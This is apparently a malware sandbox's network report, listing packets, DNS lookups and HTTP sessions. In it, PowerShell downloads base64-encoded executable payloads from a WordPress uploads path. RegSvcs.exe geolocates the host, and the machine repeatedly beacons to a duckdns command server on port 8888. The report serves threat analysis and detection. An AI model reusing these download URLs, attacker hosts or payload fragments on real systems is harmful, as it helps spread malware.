                                  Sep 26, 2024 10:55:38.954215050 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.955319881 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.955358028 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.955399990 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.955405951 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.955432892 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.955465078 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.955518961 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.956223011 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.956268072 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.956331015 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.956347942 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.956372023 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.957329035 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.957376957 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.957401037 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.957413912 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.957443953 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.958539009 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.958578110 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.958674908 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.958689928 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.958734989 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.963577032 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.963623047 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.963643074 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.963655949 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.963687897 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.036792994 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.036842108 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.036873102 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.036931038 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.036959887 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.037312984 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.037369967 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.037386894 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.037400961 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.037424088 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.037447929 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.037448883 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.037929058 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.037964106 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.037983894 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.038003922 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.038032055 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.038032055 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.038655043 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.038681984 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.038718939 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.038731098 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.038835049 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.039242029 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.039262056 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.039290905 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.039303064 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.039330006 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.040036917 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.040067911 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.040096045 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.040107012 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.040138960 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.040741920 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.040765047 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.040817976 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.040829897 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.040857077 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.046821117 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.046855927 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.046983957 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.046983957 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.046998978 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.126514912 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.126574039 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.126616001 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.126650095 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.126678944 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.127079010 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.127135038 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.127161026 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.127186060 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.127207041 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.127234936 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.127253056 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.127727985 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.127788067 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.127800941 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.127815008 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.127861023 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.128177881 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.128226995 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.128253937 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.128266096 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.128309011 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.129019976 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.129057884 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.129091024 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.129103899 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.129129887 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.129817009 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.129864931 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.129900932 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.129913092 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.129957914 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.130603075 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.130641937 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.130687952 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.130701065 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.130744934 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.135885000 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.135936975 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.135983944 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.135997057 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.136043072 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.186161041 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.209646940 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.209702969 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.209755898 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.209770918 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.209803104 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.209822893 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.210241079 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.210284948 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.210323095 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.210334063 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.210362911 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.210398912 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.210671902 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.210719109 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.210756063 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.210767031 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.210813999 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.210839033 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.211308002 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.211361885 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.211400032 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.211410999 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.211443901 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.211463928 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.211886883 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.211929083 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.211975098 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.212002039 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.212030888 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.212095022 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.212446928 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.212487936 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.212522984 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.212533951 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.212594032 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.212594986 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.212970972 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.213013887 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.213044882 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.213056087 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.213157892 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.213159084 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.219223022 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.219266891 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.219301939 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.219314098 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.219355106 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.219398975 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.296195030 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.296253920 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.296304941 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.296334982 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.296405077 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.296515942 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.296910048 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.296955109 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.296992064 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.297008991 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.297039032 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.297079086 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.297085047 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.297110081 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.297152996 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.297158003 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.297194004 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.297205925 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.297250032 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.297302008 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.297514915 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.297602892 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.297616005 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.297775984 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.298080921 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.298161983 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.298304081 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:40.335937977 CEST888849733173.208.241.155192.168.2.4
                                  Sep 26, 2024 10:55:40.337646008 CEST497338888192.168.2.4173.208.241.155
                                  Sep 26, 2024 10:55:40.342792034 CEST888849733173.208.241.155192.168.2.4
                                  Sep 26, 2024 10:56:10.361915112 CEST888849733173.208.241.155192.168.2.4
                                  Sep 26, 2024 10:56:10.363615990 CEST497338888192.168.2.4173.208.241.155
                                  Sep 26, 2024 10:56:10.370065928 CEST888849733173.208.241.155192.168.2.4
                                  Sep 26, 2024 10:56:40.403588057 CEST888849733173.208.241.155192.168.2.4
                                  Sep 26, 2024 10:56:40.430078030 CEST497338888192.168.2.4173.208.241.155
                                  Sep 26, 2024 10:56:40.435070038 CEST888849733173.208.241.155192.168.2.4
                                  Sep 26, 2024 10:57:04.630680084 CEST4973480192.168.2.4178.237.33.50
                                  Sep 26, 2024 10:57:04.951988935 CEST4973480192.168.2.4178.237.33.50
                                  Sep 26, 2024 10:57:05.639532089 CEST4973480192.168.2.4178.237.33.50
                                  Sep 26, 2024 10:57:06.951997042 CEST4973480192.168.2.4178.237.33.50
                                  Sep 26, 2024 10:57:09.451957941 CEST4973480192.168.2.4178.237.33.50
                                  Sep 26, 2024 10:57:10.420088053 CEST888849733173.208.241.155192.168.2.4
                                  Sep 26, 2024 10:57:10.447021008 CEST497338888192.168.2.4173.208.241.155
                                  Sep 26, 2024 10:57:10.451865911 CEST888849733173.208.241.155192.168.2.4
                                  Sep 26, 2024 10:57:14.451968908 CEST4973480192.168.2.4178.237.33.50
                                  Sep 26, 2024 10:57:24.139492035 CEST4973480192.168.2.4178.237.33.50
                                  Sep 26, 2024 10:57:40.448890924 CEST888849733173.208.241.155192.168.2.4
                                  Sep 26, 2024 10:57:40.449947119 CEST497338888192.168.2.4173.208.241.155
                                  Sep 26, 2024 10:57:40.455337048 CEST888849733173.208.241.155192.168.2.4

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Sep 26, 2024 10:55:08.666109085 CEST6439953192.168.2.41.1.1.1
                                  Sep 26, 2024 10:55:08.983028889 CEST53643991.1.1.1192.168.2.4
                                  Sep 26, 2024 10:55:11.990962029 CEST5006253192.168.2.41.1.1.1
                                  Sep 26, 2024 10:55:12.985208988 CEST5006253192.168.2.41.1.1.1
                                  Sep 26, 2024 10:55:13.611675978 CEST53500621.1.1.1192.168.2.4
                                  Sep 26, 2024 10:55:13.611826897 CEST53500621.1.1.1192.168.2.4
                                  Sep 26, 2024 10:55:14.633678913 CEST6343553192.168.2.41.1.1.1
                                  Sep 26, 2024 10:55:14.640899897 CEST53634351.1.1.1192.168.2.4

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Sep 26, 2024 10:55:08.666109085 CEST192.168.2.41.1.1.10xdd0dStandard query (0)www.informacionoportuna.comA (IP address)IN (0x0001)false
                                  Sep 26, 2024 10:55:11.990962029 CEST192.168.2.41.1.1.10xbfa0Standard query (0)comandoespecial2023.duckdns.orgA (IP address)IN (0x0001)false
                                  Sep 26, 2024 10:55:12.985208988 CEST192.168.2.41.1.1.10xbfa0Standard query (0)comandoespecial2023.duckdns.orgA (IP address)IN (0x0001)false
                                  Sep 26, 2024 10:55:14.633678913 CEST192.168.2.41.1.1.10xf89bStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Sep 26, 2024 10:55:08.983028889 CEST1.1.1.1192.168.2.40xdd0dNo error (0)www.informacionoportuna.cominformacionoportuna.comCNAME (Canonical name)IN (0x0001)false
                                  Sep 26, 2024 10:55:08.983028889 CEST1.1.1.1192.168.2.40xdd0dNo error (0)informacionoportuna.com15.235.85.194A (IP address)IN (0x0001)false
                                  Sep 26, 2024 10:55:13.611675978 CEST1.1.1.1192.168.2.40xbfa0No error (0)comandoespecial2023.duckdns.org173.208.241.155A (IP address)IN (0x0001)false
                                  Sep 26, 2024 10:55:13.611826897 CEST1.1.1.1192.168.2.40xbfa0No error (0)comandoespecial2023.duckdns.org173.208.241.155A (IP address)IN (0x0001)false
                                  Sep 26, 2024 10:55:14.640899897 CEST1.1.1.1192.168.2.40xf89bNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • www.informacionoportuna.com
                                  • geoplugin.net

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.449734178.237.33.50802124C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 26, 2024 10:55:14.649272919 CEST71OUTGET /json.gp HTTP/1.1
                                  Host: geoplugin.net
                                  Cache-Control: no-cache
                                  Sep 26, 2024 10:55:15.283359051 CEST1170INHTTP/1.1 200 OK
                                  date: Thu, 26 Sep 2024 08:55:15 GMT
                                  server: Apache
                                  content-length: 962
                                  content-type: application/json; charset=utf-8
                                  cache-control: public, max-age=300
                                  access-control-allow-origin: *
                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                  Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                  HTTPS Proxied Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.44973015.235.85.1944436916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-26 08:55:09 UTC117OUTGET /wp-content/uploads/2024/09/dllskyfal.txt HTTP/1.1
                                  Host: www.informacionoportuna.com
                                  Connection: Keep-Alive
                                  2024-09-26 08:55:09 UTC211INHTTP/1.1 200 OK
                                  Connection: close
                                  content-type: text/plain
                                  last-modified: Mon, 16 Sep 2024 03:18:42 GMT
                                  accept-ranges: bytes
                                  content-length: 11608
                                  date: Thu, 26 Sep 2024 08:55:09 GMT
                                  server: LiteSpeed
                                  2024-09-26 08:55:09 UTC1157INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4c 6d 64 35 32 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 49 69 41 4c 41 56 41 41 41 42 6f 41 41 41 41 47 41 41 41 41 41 41 41 41 6a 6a 67 41 41 41 41 67 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 67 41 41 41 41 41 67 41
                                  Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALmd52YAAAAAAAAAAOAAIiALAVAAABoAAAAGAAAAAAAAjjgAAAAgAAAAAAAAAAAAEAAgAAAAAgA
                                  2024-09-26 08:55:09 UTC10451INData Raw: 77 49 41 41 41 72 2b 41 52 4d 4d 45 51 77 35 41 67 45 41 41 41 41 62 6a 51 59 41 41 41 45 6c 46 6e 4a 52 41 41 42 77 6f 69 55 58 42 4b 49 6c 47 48 49 4f 41 51 42 77 6f 69 55 5a 4b 41 6f 41 41 41 71 69 4a 52 70 79 64 41 45 41 63 4b 49 6f 43 77 41 41 43 68 4d 4e 4b 41 6f 41 41 41 70 79 33 67 45 41 63 43 67 4d 41 41 41 4b 45 51 30 6f 44 51 41 41 43 67 42 79 37 67 45 41 63 43 67 4b 41 41 41 4b 63 74 34 42 41 48 41 6f 44 67 41 41 43 68 59 57 46 53 67 50 41 41 41 4b 4a 68 75 4e 42 67 41 41 41 53 55 57 63 6f 6b 43 41 48 43 69 4a 52 63 44 6f 69 55 59 63 72 38 43 41 48 43 69 4a 52 6b 6f 43 67 41 41 43 71 49 6c 47 6e 4c 68 41 67 42 77 6f 69 67 4c 41 41 41 4b 46 68 59 56 4b 41 38 41 41 41 6f 6d 63 75 55 43 41 48 41 54 44 68 75 4e 42 67 41 41 41 53 55 57 45 51 36 69
                                  Data Ascii: wIAAAr+ARMMEQw5AgEAAAAbjQYAAAElFnJRAABwoiUXBKIlGHIOAQBwoiUZKAoAAAqiJRpydAEAcKIoCwAAChMNKAoAAApy3gEAcCgMAAAKEQ0oDQAACgBy7gEAcCgKAAAKct4BAHAoDgAAChYWFSgPAAAKJhuNBgAAASUWcokCAHCiJRcDoiUYcr8CAHCiJRkoCgAACqIlGnLhAgBwoigLAAAKFhYVKA8AAAomcuUCAHATDhuNBgAAASUWEQ6i


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.44973115.235.85.1944436916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-26 08:55:10 UTC89OUTGET /wp-content/uploads/2024/09/pesky.txt HTTP/1.1
                                  Host: www.informacionoportuna.com
                                  2024-09-26 08:55:10 UTC211INHTTP/1.1 200 OK
                                  Connection: close
                                  content-type: text/plain
                                  last-modified: Mon, 16 Sep 2024 02:52:42 GMT
                                  accept-ranges: bytes
                                  content-length: 57008
                                  date: Thu, 26 Sep 2024 08:55:10 GMT
                                  server: LiteSpeed
